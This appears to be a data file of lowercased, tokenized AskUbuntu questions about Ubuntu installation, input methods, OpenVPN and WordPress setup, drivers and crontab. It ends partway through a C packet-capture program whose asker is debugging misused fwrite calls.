372300	how do i install ubuntu 13.10 from a partition on my mac ?	i am trying to install ubuntu 13.10 on my macbook air . i 've previously had no issue installing from a usb stick to this machine . however , i do n't currently have access to a usb stick or any external media at all ! what i 've done so far is partitioned my ssd into 3 partitions . one holds os x , another is a 5gb partition intended for the install iso , and a third is intended to be the target for that install . the second two partitions are formatted as fat . i 've used dd ( with and without bs=1m ) to `` burn '' my iso to the small 5gb fat partition . i also at one point tried using hdituil to convert my iso file to img and went through the same process with same result below . after `` burning '' my iso to the small partition , i reboot into refind . refind sees my small 5gb partition perfectly well , and when i select that partition it loads grub appropriately . however , from here , regardless of what i choose , ubuntu will start to load and then after a few minutes crash out to : buzybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) enter 'help ' for a list of built in commands . ( initramfs ) unable to find a medium containing a live file system . i 've googled this error and found a number of people encountering it when trying to install from usb , but no solutions seem applicable to my case ( installing from a partition on my ssd , to another partition on my ssd ) . is there any solution to this , or do i just need to wait a few days until i have access to a usb stick ? many thanks in advance , and apologies for length -- i figured i 'd err on the side of being exhaustive rather than having people suggest things i 've already tried .
372305	after the upgrading to 13.10 , i ca n't input japanese and chinese in emacs	i have just upgraded ubuntu from 13.04 to 13.10 . it seems ibus have been made big changes.then i just go to system setting - > text entry settings - > add `` chinese pinyin '' and `` japanese anty '' input method . it works well when i input chinese or japanese in terminal or .txt file . but when i want to input chinese and japanese in emacs . even though i have enable ibus-mode in the buffer and change to chinese pinyin or japanese anty input method . it just output the english word . below is the ibus configure in .emacs.by the way , it works well before i upgrade ubuntu to 13.10 and emacs to 24.3.1 . ( add-to-list 'load-path ( concat my-emacs-path `` /ibus-el-0.3.2 '' ) ) ; ; ( setq ibus-python-shell-command-name `` python2.7 '' ) ( require 'ibus ) ; ; turn on ibus-mode automatically after loading .emacs ( add-hook 'after-init-hook 'ibus-mode-on ) ( setq ibus-cursor-color ' ( `` red '' `` blue '' `` limegreen '' ) )
372306	bootable external hdd	i have a few fat35 formatted external hdds connected to pc via usb dongle . i had no problems making such disks in windows with universal-usb-installer , or yumi . unfortunately unetbootin wo n't do this in ubuntu 12.04 . is this at all possible ? if not with unetbootin , then maybe there are some other tool exists ?
372307	amd catalyst diskless cluster	i 'm using ubuntu 13.10 to set up a diskless compute cluster . when i use the procedure detailed in https : //help.ubuntu.com/community/disklessubuntuhowto , i successfully am able to boot all four nodes . however , once i install catalyst , i immediately have problems : only one diskless node boots properly , with the other two hanging while attempting to start x . my assumption is that my catalyst build was somehow specific to the node which i booted from first , which somehow prevents the other nodes from loading catalyst . can anyone provide hints to help solve this ? thank you in advance !
372308	how to turn off `` share the same input method among all application '' in ibus	after install ubuntu 13.10 , i ca n't turn off `` share the same input method among all application '' of ibus . not same old version , i ca n't find this option . how to turn off it ? thanks ,
372309	lemp stack on ubuntu server 13.04 not parsing php switch statement properly	on my ubuntu 12.04 server lts on nginx 1.1.19 , the following php code works properly : switch ( $ _session [ 'user ' ] [ 'permissions ' ] ) { case 9 : echo `` super admin privileges '' ; break ; case 0 : echo `` operator privileges '' ; break ; case 1 : echo `` line leader privileges '' ; break ; case 2 : echo `` supervisor privileges '' ; break ; case 3 : echo `` engineer privileges '' ; break ; case 4 : echo `` manager privileges '' ; break ; case 5 : echo `` administrator privileges '' ; break ; default : echo `` operator privileges '' ; } however , i have a backup server running ubuntu server 13.04 on nginx 1.4.1 which has the exact same copy of the script ( synced ) but instead of breaking on the break ; command , it echos the whole php script . the output on the 12.04 box is similar to this : you are logged in with super admin privileges but on the 13.04 box , the output is like this : you are logged in logged in with super admin privileges '' ; break ; case 0 : echo `` operator privileges '' ; break ; case 1 : echo `` line leader privileges '' ; break ; case 2 : echo `` supervisor privileges '' ; break ; case 3 : echo `` engineer privileges '' ; break ; case 4 : echo `` manager privileges '' ; break ; case 5 : echo `` administrator privileges '' ; break ; default : echo `` operator privileges '' ; } ? > i have also tried changing the script from switch statement to if statements but same results . any idea what is wrong ?
372310	installing lubuntu on to android tablet and switching os in between	i would like to install lubuntu onto my tablet , as it seems more lightweight than ubuntu . however , it seems there are only images for windows/ mac ? for android devices , what image shall i download ? i 've also found an article about installing ubuntu on android phone . and by installing vnc , it seems that one could `` switch '' from os to os on the phone , i.e . i could be viewing the ubuntu os on the phone via a vnc viewer , and closing the viewer gives me back the android os . my questions are : 1 ) what ubuntu/lubuntu image ( windows ? mac ? ) shall i download in order to get this done ? 2 ) my ultimate goal is to run some windows programs on a android tablet . i am planning install a lubuntu os and then wine ... what will be the minimum hardware requirement in order to do this ? thank you very much !
372312	in-app paymnt methods	i 'm interested in developing for ubuntu ( mostly phones ) and i ca n't seem to find the guidelines on app publishing , will apps only work through the ubuntu software center , or can users download and install an app from a website like is possible with an android apk ? also , are there any rules regarding in-app purchase methods , ( i hope the minimum price here is n't $ 2.99 in-app as well or i 'm not going to even bother developing for ubuntu and will just stick with android ) google for example , requires that in-app purchases go through their servers so that it is n't possible to use other funding methods at least for play store published apps . my main questions here are : would it be possible to release an app for ubuntu touch that accepted bitcoin , paypal , or other methods for in-app purchases ? if not , would it be possible to release apps through a personal website or 3rd party app market that could use alternative payment methods ?
372313	how to find the original file of a soft link ?	for example , i have a file a , and i do the followings . ln -s a b ln -s b c ln -s c d if i use readlink d , i will get c. so i have to run many times to get a . is there an easy way to get a ? update : if i want to locate the original file of /usr/bin/java , i have to do it many times to get /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java . the files and links are not in the same folder .
372314	how to get wireless to work on my hp compaq nx6325 notebook on 12.04	when my laptop ran xp , the wireless worked perfectly . now the only way i get internet is having it wired in my living room - which is massively inconvenient for me seeing as my room is outside . i have downloaded the driver from 'additional drivers ' , reset my computer ( with difficulty , it also does n't seem to like turning off , so i have to 'kill ' it ) and still nothing ! i have looked all over the internet trying to find solutions but i just cant seem to get it to work . i have a usb wireless stick but i ca n't load the driver from the cd . i got this comment on a previous question : `` using either snaptic package manager or ubuntu 's own software centre , remove `` bcmwl-kernel-source '' if it 's already installed . next , search for `` firmware-b43-installer” and “b43-fwcutter” and install both . finally , running software sources and checking the additional drivers tab you should find broadcom sta wireless driver that you can select , install and on reboot hopefully have wireless working ok ... '' which i replied : `` right , so i tried to find/remove `` bcmwl-kernel-source '' but could n't find anything . i managed to install both `` firmware-b43-installer” and “b43-fwcutter” using terminal , after finding out how it worked . and lastly , i could n't figure out how to find 'broadcom sta wireless driver ' - still no more additional drivers . and my wireless is still not working . my laptop has a button that turns wifi on and off and since i put ubuntu on it , it has n't worked . and also , my computer still does n't seem to restart properly - it just gets stuck on the ubuntu loading screen . '' - hope that helps , somewhat i am very new to linux , not very technical and in need of help ! -running ubuntu 12.04 32bit on a hp compaq nx6325 notebook thank you to anyone who replies , its much appreciated
372315	pythonika installation error on ubuntu 12	i have been following links : to install pythonika on ubuntu : how to install pythonika on ubuntu ? i get error : $ make -f makefile.linux '' /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux/compileradditions/mprep '' pythonika.tm -o pythonikatm.c /bin/sh : 1 : /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux/compileradditions/mprep : not found make : *** [ pythonikatm.o ] error 127
372319	how to install egroupware+perp in ubuntu 12.04 desktop 64bit	i am trying to install egw1.6 and perp modules in a ubuntu 12.04 machine . it gave several errors . did somebody install it without a problem ? . please guide me to install it correctly . what i did was , installed xammp for linux ( /opt/lammp ) untar the egw-1.6.001+perp-0.4 to htdocs folder .
372324	ca n't see second hard drive	i had xp pro installed , and then i installed 12.04 dual boot . system has 2 hard drives , c : ( as in windows ) is primarily os stuff , and then e : is data/personal documents . xp can still see both drives as normal after the ubuntu install , but ubuntu can only see the windows c : drive . how can i access the second drive ? i ca n't see any trace of it , using the little *nix know-how i have , which is n't much . edit : model : ata hds728080pla380 ( scsi ) disk /dev/sda : 80.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 57.7gb 57.7gb primary ntfs boot 2 57.7gb 80.0gb 22.3gb extended 5 57.7gb 76.8gb 19.1gb logical ext4 6 76.8gb 80.0gb 3216mb logical model : kingston datatraveler 2.0 ( scsi ) disk /dev/sdb : 1006mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 127kb 1006mb 1006mb primary fat32 model : linux device-mapper ( crypt ) ( dm ) disk /dev/mapper/cryptswap1 : 3216mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 3216mb 3216mb linux-swap ( v1 )
372326	openvpn not connecting	there have been a number of post similar to this , but none seem to satisfy my need . plus i am a ubuntu newbie . i followed this tutorial to completely set up openvpn on ubuntu 12.04 server . here is my server.conf file # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample openvpn 2.0 config file for # # multi-client server . # # # # this file is for the server side # # of a many-clients < - > one-server # # openvpn configuration . # # # # openvpn also supports # # single-machine < - > single-machine # # configurations ( see the examples page # # on the web site for more info ) . # # # # this config should work on windows # # or linux/bsd systems . remember on # # windows to quote pathnames and use # # double backslashes , e.g . : # # `` c : \\program files\\openvpn\\config\\foo.key '' # # # # comments are preceded with ' # ' or ' ; ' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # which local ip address should openvpn # listen on ? ( optional ) local 192.168.13.8 # which tcp/udp port should openvpn listen on ? # if you want to run multiple openvpn instances # on the same machine , use a different port # number for each one . you will need to # open up this port on your firewall . port 1194 # tcp or udp server ? proto tcp ; proto udp # `` dev tun '' will create a routed ip tunnel , # `` dev tap '' will create an ethernet tunnel . # use `` dev tap0 '' if you are ethernet bridging # and have precreated a tap0 virtual interface # and bridged it with your ethernet interface . # if you want to control access policies # over the vpn , you must create firewall # rules for the the tun/tap interface . # on non-windows systems , you can give # an explicit unit number , such as tun0 . # on windows , use `` dev-node '' for this . # on most systems , the vpn will not function # unless you partially or fully disable # the firewall for the tun/tap interface . dev tap0 up `` /etc/openvpn/up.sh br0 '' down `` /etc/openvpn/down.sh br0 '' ; dev tun # windows needs the tap-win32 adapter name # from the network connections panel if you # have more than one . on xp sp2 or higher , # you may need to selectively disable the # windows firewall for the tap adapter . # non-windows systems usually do n't need this . ; dev-node mytap # ssl/tls root certificate ( ca ) , certificate # ( cert ) , and private key ( key ) . each client # and the server must have their own cert and # key file . the server and all clients will # use the same ca file . # # see the `` easy-rsa '' directory for a series # of scripts for generating rsa certificates # and private keys . remember to use # a unique common name for the server # and each of the client certificates . # # any x509 key management system can be used . # openvpn can also use a pkcs # 12 formatted key file # ( see `` pkcs12 '' directive in man page ) . ca `` /etc/openvpn/ca.crt '' cert `` /etc/openvpn/server.crt '' key `` /etc/openvpn/server.key '' # this file should be kept secret # diffie hellman parameters . # generate your own with : # openssl dhparam -out dh1024.pem 1024 # substitute 2048 for 1024 if you are using # 2048 bit keys . dh dh1024.pem # configure server mode and supply a vpn subnet # for openvpn to draw client addresses from . # the server will take 10.8.0.1 for itself , # the rest will be made available to clients . # each client will be able to reach the server # on 10.8.0.1 . comment this line out if you are # ethernet bridging . see the man page for more info . ; server 10.8.0.0 255.255.255.0 # maintain a record of client < - > virtual ip address # associations in this file . if openvpn goes down or # is restarted , reconnecting clients can be assigned # the same virtual ip address from the pool that was # previously assigned . ifconfig-pool-persist ipp.txt # configure server mode for ethernet bridging . # you must first use your os 's bridging capability # to bridge the tap interface with the ethernet # nic interface . then you must manually set the # ip/netmask on the bridge interface , here we # assume 10.8.0.4/255.255.255.0 . finally we # must set aside an ip range in this subnet # ( start=10.8.0.50 end=10.8.0.100 ) to allocate # to connecting clients . leave this line commented # out unless you are ethernet bridging . server-bridge 192.168.13.101 255.255.255.0 192.168.13.105 192.168.13.200 # configure server mode for ethernet bridging # using a dhcp-proxy , where clients talk # to the openvpn server-side dhcp server # to receive their ip address allocation # and dns server addresses . you must first use # your os 's bridging capability to bridge the tap # interface with the ethernet nic interface . # note : this mode only works on clients ( such as # windows ) , where the client-side tap adapter is # bound to a dhcp client . ; server-bridge # push routes to the client to allow it # to reach other private subnets behind # the server . remember that these # private subnets will also need # to know to route the openvpn client # address pool ( 10.8.0.0/255.255.255.0 ) # back to the openvpn server . push `` route 192.168.13.1 255.255.255.0 '' push `` dhcp-option dns 192.168.13.201 '' push `` dhcp-option domain blahblah.dyndns-wiki.com '' ; push `` route 192.168.20.0 255.255.255.0 '' # to assign specific ip addresses to specific # clients or if a connecting client has a private # subnet behind it that should also have vpn access , # use the subdirectory `` ccd '' for client-specific # configuration files ( see man page for more info ) . # example : suppose the client # having the certificate common name `` thelonious '' # also has a small subnet behind his connecting # machine , such as 192.168.40.128/255.255.255.248 . # first , uncomment out these lines : ; client-config-dir ccd ; route 192.168.40.128 255.255.255.248 # then create a file ccd/thelonious with this line : # iroute 192.168.40.128 255.255.255.248 # this will allow thelonious ' private subnet to # access the vpn . this example will only work # if you are routing , not bridging , i.e . you are # using `` dev tun '' and `` server '' directives . # example : suppose you want to give # thelonious a fixed vpn ip address of 10.9.0.1 . # first uncomment out these lines : ; client-config-dir ccd ; route 10.9.0.0 255.255.255.252 # then add this line to ccd/thelonious : # ifconfig-push 10.9.0.1 10.9.0.2 # suppose that you want to enable different # firewall access policies for different groups # of clients . there are two methods : # ( 1 ) run multiple openvpn daemons , one for each # group , and firewall the tun/tap interface # for each group/daemon appropriately . # ( 2 ) ( advanced ) create a script to dynamically # modify the firewall in response to access # from different clients . see man # page for more info on learn-address script . ; learn-address ./script # if enabled , this directive will configure # all clients to redirect their default # network gateway through the vpn , causing # all ip traffic such as web browsing and # and dns lookups to go through the vpn # ( the openvpn server machine may need to nat # or bridge the tun/tap interface to the internet # in order for this to work properly ) . ; push `` redirect-gateway def1 bypass-dhcp '' # certain windows-specific network settings # can be pushed to clients , such as dns # or wins server addresses . caveat : # http : //openvpn.net/faq.html # dhcpcaveats # the addresses below refer to the public # dns servers provided by opendns.com . ; push `` dhcp-option dns 208.67.222.222 '' ; push `` dhcp-option dns 208.67.220.220 '' # uncomment this directive to allow different # clients to be able to `` see '' each other . # by default , clients will only see the server . # to force clients to only see the server , you # will also need to appropriately firewall the # server 's tun/tap interface . ; client-to-client # uncomment this directive if multiple clients # might connect with the same certificate/key # files or common names . this is recommended # only for testing purposes . for production use , # each client should have its own certificate/key # pair . # # if you have not generated individual # certificate/key pairs for each client , # each having its own unique `` common name '' , # uncomment this line out . ; duplicate-cn # the keepalive directive causes ping-like # messages to be sent back and forth over # the link so that each side knows when # the other side has gone down . # ping every 10 seconds , assume that remote # peer is down if no ping received during # a 120 second time period . keepalive 10 120 # for extra security beyond that provided # by ssl/tls , create an `` hmac firewall '' # to help block dos attacks and udp port flooding . # # generate with : # openvpn -- genkey -- secret ta.key # # the server and each client must have # a copy of this key . # the second parameter should be '0' # on the server and '1 ' on the clients . ; tls-auth ta.key 0 # this file is secret # select a cryptographic cipher . # this config item must be copied to # the client config file as well . ; cipher bf-cbc # blowfish ( default ) ; cipher aes-128-cbc # aes ; cipher des-ede3-cbc # triple-des # enable compression on the vpn link . # if you enable it here , you must also # enable it in the client config file . comp-lzo # the maximum number of concurrently connected # clients we want to allow . ; max-clients 100 # it 's a good idea to reduce the openvpn # daemon 's privileges after initialization . # # you can uncomment this out on # non-windows systems . user nobody group nogroup # the persist options will try to avoid # accessing certain resources on restart # that may no longer be accessible because # of the privilege downgrade . persist-key persist-tun # output a short status file showing # current connections , truncated # and rewritten every minute . status openvpn-status.log # by default , log messages will go to the syslog ( or # on windows , if running as a service , they will go to # the `` \program files\openvpn\log '' directory ) . # use log or log-append to override this default . # `` log '' will truncate the log file on openvpn startup , # while `` log-append '' will append to it . use one # or the other ( but not both ) . ; log openvpn.log ; log-append openvpn.log # set the appropriate level of log # file verbosity . # # 0 is silent , except for fatal errors # 4 is reasonable for general usage # 5 and 6 can help to debug connection problems # 9 is extremely verbose verb 3 # silence repeating messages . at most 20 # sequential messages of the same message # category will be output to the log . ; mute 20 i am using windows 7 as the client and set that up accordingly using the openvpn gui . that conf file is as follows : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample client-side openvpn 2.0 config file # # for connecting to multi-client server . # # # # this configuration can be used by multiple # # clients , however each client should have # # its own cert and key files . # # # # on windows , you might want to rename this # # file so it has a .ovpn extension # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # specify that we are a client and that we # will be pulling certain config file directives # from the server . client # use the same setting as you are using on # the server . # on most systems , the vpn will not function # unless you partially or fully disable # the firewall for the tun/tap interface . dev tap0 up `` /etc/openvpn/up.sh br0 '' down `` /etc/openvpn/down.sh br0 '' ; dev tun # windows needs the tap-win32 adapter name # from the network connections panel # if you have more than one . on xp sp2 , # you may need to disable the firewall # for the tap adapter . ; dev-node mytap # are we connecting to a tcp or # udp server ? use the same setting as # on the server . proto tcp ; proto udp # the hostname/ip and port of the server . # you can have multiple remote entries # to load balance between the servers . blahblah.dyndns-wiki.com 1194 ; remote my-server-2 1194 # choose a random host from the remote # list for load-balancing . otherwise # try hosts in the order specified . ; remote-random # keep trying indefinitely to resolve the # host name of the openvpn server . very useful # on machines which are not permanently connected # to the internet such as laptops . resolv-retry infinite # most clients do n't need to bind to # a specific local port number . nobind # downgrade privileges after initialization ( non-windows only ) user nobody group nobody # try to preserve some state across restarts . persist-key persist-tun # if you are connecting through an # http proxy to reach the actual openvpn # server , put the proxy server/ip and # port number here . see the man page # if your proxy server requires # authentication . ; http-proxy-retry # retry on connection failures ; http-proxy [ proxy server ] [ proxy port # ] # wireless networks often produce a lot # of duplicate packets . set this flag # to silence duplicate packet warnings . ; mute-replay-warnings # ssl/tls parms . # see the server config file for more # description . it 's best to use # a separate .crt/.key file pair # for each client . a single ca # file can be used for all clients . ca `` c : \\program files\openvpn\config\\ca.crt '' cert `` c : \\program files\openvpn\config\\chadmwade-think.crt '' key `` c : \\program files\openvpn\config\\chadmwade-think.key '' # verify server certificate by checking # that the certicate has the nscerttype # field set to `` server '' . this is an # important precaution to protect against # a potential attack discussed here : # http : //openvpn.net/howto.html # mitm # # to use this feature , you will need to generate # your server certificates with the nscerttype # field set to `` server '' . the build-key-server # script in the easy-rsa folder will do this . ns-cert-type server # if a tls-auth key is used on the server # then every client must also have the key . ; tls-auth ta.key 1 # select a cryptographic cipher . # if the cipher option is used on the server # then you must also specify it here . ; cipher x # enable compression on the vpn link . # do n't enable this unless it is also # enabled in the server config file . comp-lzo # set log file verbosity . verb 3 # silence repeating messages ; mute 20 not sure whats left to do .
372331	why are my scroll bars so wacky looking ?	i 'm not sure what i did , but my scroll bars look like hell . in this picture , you can see them adjacent to the suggested questions and at the windows edge . what is that about ? this behavior is consistent across all applications -- at the top and bottom of any scroll bar , i see a tall grey box . and in some cases i get this wacky multiple horizontal scroll : in trying to fix this , i managed to totally trash my compiz settings ( what do i do about my busted gui ? ) so now i 've restored compiz to its default settings and the scrollbars are still totally crazy looking .
372332	keyboard not working in ubuntu 12.10	hi i am trying to install ubuntu 12.10 from one day but unable to do so since my keyboard is not working . i am unable to type anything in username or password or name etc . even when running from live cd i can not type anything . i have a ps2 keyboard . its working fine in windows . how to get my keyboard working
372333	why no pgadmin in launcher for standard user ?	i have installed pgadmin and it all works well . but when i log in as a standard user on ubuntu 12.04 i do n't see pgadmin in the launcher . i have other programs like libre office , lazarus and teamviewer in the launcher but not pgadmin . is there a reason why this is happening and what i can do to allow this ? thanks !
372334	no ethernet or wifi conection ubuntu 12.04 desktop 64 bit on toshiba satellite pro l850	i newly installed ubuntu 12.04 for toshiba satellite pro l850 laptop . ethernet or wifi not working . i did lot of googling around 2 days to fix the problem . still no solution . please help me to get the internet connection . i tried following link also , but did n't work . ethernet conection not working atheros ar8152 os 12.04 if i install older linux kernel will this issue get solved ? please help me . jane
372335	is there a way of sandboxing applications so when they fail they do n't crash ubuntu entirely ?	sometimes i 'm running cpu-intensive commands in terminal ( for example , reading/writing large amounts of data to disk ) and they immediately slow down the entire unity gui . is there any way of sandboxing applications so they do n't slow the entire system ? i know apple uses some sort of sandboxing in ios so that a faulty third-party app wo n't crash the ui , is there anything similar for ubuntu ? is there a unity process that can be reniced to max priority -20 so that it wo n't slow down when other intensive apps start running ?
372336	problem with crontab entry with time tag	does the following entry in a crontab have any problem . it 's not giving output with time tag.. shell=/bin/bash path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/local/ferret/bin */1 * * * * /usr/bin/env > /home/vasu/env.output. $ ( date + '' % d % b % y. % r '' )
372339	permissions about saving files to an sd card	i am having trouble while saving valuable pdf files to my 16gb sdcard . i can save just fine on my system hard drive , but every time i try to move it to the sd card or save it straight to there , it gives me a insufficient permissions message at the bottom of my screen . i 'd like to have these files on the sd card for so i can move them from system to system .
372340	restore windows 7 system image from ubuntu	i had searched and searched and can not find a simple answer to this question . i have a full backup data + system image of my current windows 7 on an external hard-disk . if i were to install ubuntu , could i wipe it entirely and restore my backup if things do n't go well on ubuntu ? i know this is possible on android via nandroid backups in recovery mode , so i assume there 's some way to do it with a laptop . thank you .
372341	wordpress permissions problem on apache2 server	i have a windows 7 system . on this system i am running a vm virtual box lamp server with ubuntu 12.04 , apache2 , mysql and phpmyadmin ... which is accessable via the internet . i installed wordpress cms and it is working ok . i am able to add new posts , pages , and change themes . when i attempt to upload media i get the following error file391.jpg has failed to upload due to an error unable to create directory wp-content/uploads/2013/11 . is its parent directory writable by the server ? * when i go to the parent directory and look at the permissions i notice that the ownership of the folder is root . do i change owner ? should i create a new user or user group called worpress and give it ownership ? ? ? not sure how best to do this on a web server .
372343	why do i get fwrite error while saving the data to a binary file ?	have written a c program where packets are received from the network and saves it in a binary file called 'sniff_data.bin ' . but during the compilation i am getting error as 'too few arguments to function fwrite ' . what is wrong in my program ? can anybody help me out to solve it please ? ( in the program , handler used to open the binary file is 'logfile ' ) here is my code : here is my code : void processpacket ( unsigned char* , int ) ; void print_ip_header ( unsigned char* , int ) ; void print_tcp_packet ( unsigned char * , int ) ; void print_udp_packet ( unsigned char * , int ) ; void print_icmp_packet ( unsigned char* , int ) ; void printdata ( unsigned char* , int ) ; file *logfile ; struct sockaddr_in source , dest ; int tcp=0 , udp=0 , icmp=0 , others=0 , igmp=0 , total=0 , i , j ; int main ( ) { int saddr_size , data_size ; struct sockaddr saddr ; gopromiscous ( ) ; unsigned char *buffer = ( unsigned char * ) malloc ( 1024 ) ; logfile=fopen ( `` sniff_data.bin '' , '' wb '' ) ; if ( logfile==null ) { printf ( `` unable to create sniff_data file . `` ) ; } printf ( `` \n starting..\n '' ) ; int sock_raw = socket ( af_packet , sock_raw , htons ( eth_p_all ) ) ; setsockopt ( sock_raw , sol_socket , so_bindtodevice , `` eth0 '' , strlen ( `` eth0 '' ) + 1 ) ; int count=30 ; while ( count > =0 ) { count -- ; saddr_size = sizeof saddr ; //receive a packet data_size = recvfrom ( sock_raw , buffer , 1024 , 0 , & saddr , ( socklen_t* ) & saddr_size ) ; if ( data_size < 0 ) { printf ( `` recvfrom error , failed to get packets\n '' ) ; return 1 ; } // if ( fwrite ( buffer , data_size , 1 , logfile ) ! = 1 ) fwrite ( buffer , data_size , 1 , logfile ) ; //now process the packet processpacket ( buffer , data_size ) ; } fclose ( logfile ) ; close ( sock_raw ) ; printf ( `` \n '' ) ; printf ( `` finished\n\n '' ) ; return 0 ; } void processpacket ( unsigned char* buffer , int size ) { //get the ip header part of this packet , excluding the ethernet header struct iphdr *iph = ( struct iphdr* ) ( buffer + sizeof ( struct ethhdr ) ) ; ++total ; switch ( iph- > protocol ) //check the protocol and do accordingly ... { case 1 : //icmp protocol ++icmp ; print_icmp_packet ( buffer , size ) ; break ; case 2 : //igmp protocol ++igmp ; break ; case 6 : //tcp protocol ++tcp ; print_tcp_packet ( buffer , size ) ; break ; case 17 : //udp protocol ++udp ; print_udp_packet ( buffer , size ) ; break ; default : //some other protocol like arp etc . ++others ; break ; } printf ( `` tcp : % d udp : % d icmp : % d igmp : % d others : % d total : % d\r '' , tcp , udp , icmp , igmp , others , total ) ; } void print_ethernet_header ( unsigned char* buffer , int size ) { struct ethhdr *eth = ( struct ethhdr * ) buffer ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` ethernet header\n '' ) ; fwrite ( logfile , `` |-destination address : % .2x- % .2x- % .2x- % .2x- % .2x- % .2x \n '' , eth- > h_dest [ 0 ] , eth- > h_dest [ 1 ] , eth- > h_dest [ 2 ] , eth- > h_dest [ 3 ] , eth- > h_dest [ 4 ] , eth- > h_dest [ 5 ] ) ; fwrite ( logfile , `` |-source address : % .2x- % .2x- % .2x- % .2x- % .2x- % .2x \n '' , eth- > h_source [ 0 ] , eth- > h_source [ 1 ] , eth- > h_source [ 2 ] , eth- > h_source [ 3 ] , eth- > h_source [ 4 ] , eth- > h_source [ 5 ] ) ; fwrite ( logfile , `` |-protocol : % u \n '' , ( unsigned short ) eth- > h_proto ) ; } void print_ip_header ( unsigned char* buffer , int size ) { print_ethernet_header ( buffer , size ) ; unsigned short iphdrlen ; struct iphdr *iph = ( struct iphdr * ) ( buffer + sizeof ( struct ethhdr ) ) ; iphdrlen =iph- > ihl*4 ; memset ( & source , 0 , sizeof ( source ) ) ; source.sin_addr.s_addr = iph- > saddr ; memset ( & dest , 0 , sizeof ( dest ) ) ; dest.sin_addr.s_addr = iph- > daddr ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` ip header\n '' ) ; fwrite ( logfile , `` |-ip version : % d\n '' , ( unsigned int ) iph- > version ) ; fwrite ( logfile , `` |-ip header length : % d dwords or % d bytes\n '' , ( unsigned int ) iph- > ihl , ( ( unsigned int ) ( iph- > ihl ) ) *4 ) ; fwrite ( logfile , `` |-type of service : % d\n '' , ( unsigned int ) iph- > tos ) ; fwrite ( logfile , `` |-ip total length : % d bytes ( size of packet ) \n '' , ntohs ( iph- > tot_len ) ) ; fwrite ( logfile , `` |-identification : % d\n '' , ntohs ( iph- > id ) ) ; //fprintf ( logfile , `` |-reserved zero field : % d\n '' , ( unsigned int ) iphdr- > ip_reserved_zero ) ; //fprintf ( logfile , `` |-dont fragment field : % d\n '' , ( unsigned int ) iphdr- > ip_dont_fragment ) ; //fprintf ( logfile , `` |-more fragment field : % d\n '' , ( unsigned int ) iphdr- > ip_more_fragment ) ; fwrite ( logfile , `` |-ttl : % d\n '' , ( unsigned int ) iph- > ttl ) ; fwrite ( logfile , `` |-protocol : % d\n '' , ( unsigned int ) iph- > protocol ) ; fwrite ( logfile , `` |-checksum : % d\n '' , ntohs ( iph- > check ) ) ; fwrite ( logfile , `` |-source ip : % s\n '' , inet_ntoa ( source.sin_addr ) ) ; fwrite ( logfile , `` |-destination ip : % s\n '' , inet_ntoa ( dest.sin_addr ) ) ; } void print_tcp_packet ( unsigned char* buffer , int size ) { unsigned short iphdrlen ; struct iphdr *iph = ( struct iphdr * ) ( buffer + sizeof ( struct ethhdr ) ) ; iphdrlen = iph- > ihl*4 ; struct tcphdr *tcph= ( struct tcphdr* ) ( buffer + iphdrlen + sizeof ( struct ethhdr ) ) ; int header_size = sizeof ( struct ethhdr ) + iphdrlen + tcph- > doff*4 ; fwrite ( logfile , `` \n\n***********************tcp packet*************************\n '' ) ; print_ip_header ( buffer , size ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` tcp header\n '' ) ; fwrite ( logfile , `` |-source port : % u\n '' , ntohs ( tcph- > source ) ) ; fwrite ( logfile , `` |-destination port : % u\n '' , ntohs ( tcph- > dest ) ) ; fwrite ( logfile , `` |-sequence number : % u\n '' , ntohl ( tcph- > seq ) ) ; fwrite ( logfile , `` |-acknowledge number : % u\n '' , ntohl ( tcph- > ack_seq ) ) ; fwrite ( logfile , `` |-header length : % d dwords or % d bytes\n '' , ( unsigned int ) tcph- > doff , ( unsigned int ) tcph- > doff*4 ) ; //fprintf ( logfile , `` |-cwr flag : % d\n '' , ( unsigned int ) tcph- > cwr ) ; //fprintf ( logfile , `` |-ecn flag : % d\n '' , ( unsigned int ) tcph- > ece ) ; fwrite ( logfile , `` |-urgent flag : % d\n '' , ( unsigned int ) tcph- > urg ) ; fwrite ( logfile , `` |-acknowledgement flag : % d\n '' , ( unsigned int ) tcph- > ack ) ; fwrite ( logfile , `` |-push flag : % d\n '' , ( unsigned int ) tcph- > psh ) ; fwrite ( logfile , `` |-reset flag : % d\n '' , ( unsigned int ) tcph- > rst ) ; fwrite ( logfile , `` |-synchronise flag : % d\n '' , ( unsigned int ) tcph- > syn ) ; fwrite ( logfile , `` |-finish flag : % d\n '' , ( unsigned int ) tcph- > fin ) ; fwrite ( logfile , `` |-window : % d\n '' , ntohs ( tcph- > window ) ) ; fwrite ( logfile , `` |-checksum : % d\n '' , ntohs ( tcph- > check ) ) ; fwrite ( logfile , `` |-urgent pointer : % d\n '' , tcph- > urg_ptr ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` data dump `` ) ; fwrite ( logfile , `` \n '' ) ; fwrite ( logfile , `` ip header\n '' ) ; printdata ( buffer , iphdrlen ) ; fwrite ( logfile , `` tcp header\n '' ) ; printdata ( buffer+iphdrlen , tcph- > doff*4 ) ; fwrite ( logfile , `` data payload\n '' ) ; printdata ( buffer + header_size , size - header_size ) ; fwrite ( logfile , `` \n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # '' ) ; } void print_udp_packet ( unsigned char *buffer , int size ) { unsigned short iphdrlen ; struct iphdr *iph = ( struct iphdr * ) ( buffer + sizeof ( struct ethhdr ) ) ; iphdrlen = iph- > ihl*4 ; 